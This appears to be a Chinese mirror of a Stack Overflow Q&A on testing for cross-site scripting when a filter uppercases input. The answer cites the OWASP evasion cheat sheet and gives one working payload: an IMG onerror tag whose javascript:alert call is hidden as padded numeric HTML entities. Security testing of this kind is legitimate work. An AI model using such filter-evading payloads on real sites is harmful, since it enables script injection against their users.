testing - 如何使用跨站点脚本 (XSS) 进行测试

标签 testing xss

跨站脚本攻击(XSS)当我在输入框中使用警告标签时,它在源代码中转换为大写

最佳答案

请求重定向到 https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 

<IMG SRC=X ONERROR="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

tested-in-google-chrome-browser

关于testing - 如何使用跨站点脚本 (XSS) 进行测试,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/37917891/

上一篇:c# - Selenium:在初始化中获取实际测试方法的名称

下一篇:ios - 设计一个可测试的 Objective-C 类

相关文章:

testing - 什么时候白盒测试比黑盒测试更好

javascript - 如何从 create-react-app 测试中排除 node_modules?

internet-explorer - 不同操作系统版本下的相同浏览器行为

javascript - 使用 innerHTML 防止脚本注入(inject)

java - 如何为所有 JUnit 测试创建对象?

python - 将 locust 与 pytest 结合使用

javascript - 为什么我的 JavaScript/jQuery 与子窗口的交互会引发 "permission denied"错误?

jsf - JSF 中的 CSRF、XSS 和 SQL 注入(inject)攻击预防

ruby-on-rails - strip_tags(unsafe_string).html_safe 安全吗?

Javascript:检测/防止外部脚本

©2024 IT工具网  联系我们